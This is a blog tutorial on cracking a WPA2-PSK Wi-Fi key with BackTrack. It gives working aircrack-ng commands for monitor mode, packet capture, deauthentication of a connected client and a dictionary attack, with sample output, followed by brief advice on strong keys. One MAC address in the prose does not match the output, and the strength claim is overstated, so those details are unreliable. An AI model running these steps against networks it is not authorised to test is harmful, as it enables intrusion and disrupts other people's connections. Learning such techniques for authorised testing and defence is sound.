30 January 2014

Cracking WPA encryption using BackTrack (dictionary attack)

1. Some background info
WPA stands for WiFi Protected Access and is a security protocol for protecting wireless networks. WPA and WPA2 have been developed in response to the serious weaknesses discovered in WEP. For information on how to crack WEP encrypted access points see this post.

2. The task
In this post we will crack a WPA2 encrypted access point which uses a preshared key. For that we will use BackTrack, our trusty pentesting distribution.

3. Requirements
- a laptop/PC with a wireless card that supports packet injection. Check on the Internet if your wireless card model supports this function;
- BackTrack 5, either as a live CD, live USB or installed on your computer. You can get the latest BackTrack image here;
- a wireless access point configured to use WPA2-PSK encryption;
- a client connected to the access point (another laptop/smartphone/etc.)

4. Let's begin
Open a terminal window.
First things first, we need to enable monitoring mode for our wireless card.

airmon-ng start wlan0

Now that our wireless card is properly setup, let's find our network. The following command will enumerate the wireless access points and clients in range and also
provide us with useful information

airodump-ng mon0

The output is something like this:

 CH 13 ][ Elapsed: 4 s ][ 2014-01-29 14:08                                      
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID              
 80:1F:02:4B:F9:5C  -45        8        0    0  11  54e  WPA2 CCMP   PSK  Edimax AP          
 10:BF:48:92:A2:80  -87        5        0    0    1  54e  WPA2 CCMP   PSK  ASUS                
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                    
 80:1F:02:4B:F9:5C  60:D8:19:A7:33:21  -50    0 - 5e     0        1                            

The above output shows us that there are two access points in range, Edimax AP and ASUS, both using WPA2-PSK encryption.
We can also see that there is a wireless client with MAC address D8:50:E6:20:D1:07 being connected to our target (MAC 80:1F:02:4B:F9:5C).
We're going to need that client to get the relevant packet which we're going to crack and get the key from.

Now that we know our target it's time to get to work. We're going to have airodump-ng capture packets from our target and write them to a .cap file.
The following command will do it

airodump-ng -w EdimaxCapture --bssid 80:1F:02:4B:F9:5C --channel 11 mon0

The idea here is to catch the so-called handshake. The handshake represents a set of messages exchanged between the client and the access point which finalize with the client being authenticated (assuming he has the right key). The thing is the handshake only occurs when a client first connects to the access point. So we have two options. We either wait for a new client to connect (neah) or we could simply disconnect a connected client and let them attempt to reconnect. Since the second option sounds more interesting, let's do that. We're going to use aireplay-ng to send a deauth packet to the client.
Let's open a new terminal window and run this command:

aireplay-ng -a 80:1F:02:4B:F9:5C -c 60:D8:19:A7:33:21 --deauth 4 mon0

So we've send 4 deauth packets to the client connected to the target. Time to get back to our terminal window capturing the packets and see if anything interesting was caught:

 CH 11 ][ Elapsed: 9 mins ][ 2014-01-29 14:25 ][ WPA handshake: 80:1F:02:4B:F9:5C            
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID          
 80:1F:02:4B:F9:5C  -39 100     5378     1155    2  11  54e  WPA2 CCMP   PSK  Edimax AP      
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                    
 80:1F:02:4B:F9:5C  60:D8:19:A7:33:21  -127    1e- 0e     0      655                          

Aha, seems like we caught a handshake for our target. Look at the top-right part of the output.
Now that we caught it we can stop this and start the actual cracking.

We are going to use a dictionary attack to attempt to find the password. This dictionary is merely a text file which contains a string on each line. This is where the tricky part comes. For our attack to be succesful, the key must be one of those strings. The internet is full of wordlists which you can try to use to crack a password. For the purpose of this tutorial I created a small wordlist which also contains the key for the access point.
Let's run the following command and see what comes up:

aircrack-ng -w wordlist.txt -a 2 -b 80:1F:02:4B:F9:5C EdimaxCapture-02.cap

One quick note: even though the -w argument for airodump-ng was EdimaxCapture, it created EdimaxCapture-02.cap. If you get an error when running aircrack saying that it cannot find the file, use the ls command to see what files are in the current folder.

If aircrack finds the key it will output this:

                                 Aircrack-ng 1.1 r2178

                   [00:00:00] 6 keys tested (403.00 k/s)

                           KEY FOUND! [ Test1234 ]

      Master Key     : 0C 21 E6 27 23 1E AD 61 B5 29 BD FE 74 A0 89 C7
                       D4 77 88 92 78 D1 6D DD A8 4F 79 4A 34 32 1A 4D

      Transient Key  : BC 29 70 E1 CF 79 11 13 A8 BC 6A 5B 38 7E D8 C8
                       5F B0 51 24 51 A0 D8 6E C3 1E 8B 24 53 DD F6 A7
                       DF B1 71 6D 27 C5 23 55 9A 7C 17 4D C0 AC B2 27
                       BC 9E 72 98 C6 0E D2 6A 0E 22 49 16 19 CD 99 31

      EAPOL HMAC     : 30 0F 90 38 7C C2 21 4F 6A 2E 30 48 30 74 2C F6

Congratulations, you have just cracked the key.

5. Alternatives
BackTrack also provides other applications for cracking WPA. The most notable is Gerix (Exploitation Tools->Wireless Exploitation Tools->WLAN Exploitation->Gerix-wifi-cracker-ng) which offers an intuitive GUI and point-and-click navigation. Play around and experiment.

6. How to defend
This attack is easy to fend off because it relies on guessing the key. So use something that's hard to guess. An 8 characters key with upper and lower case characters, symbols and numbers would be impossible to crack with this attack. More characters, better protection. Just don't go nuts with really long ones. I consider a 16 characters key to be more than enough (something like d!4PfY#cM&35zt@5).

7. What's next?
There is however a way to crack a WPA2-PSK encrypted access point no matter how strong the key is and that is through WPS (WiFi Protected Setup). We will cover this attack in the next post.

No comments:

Post a Comment

Commenting is a privilege, not a right. Use it wisely.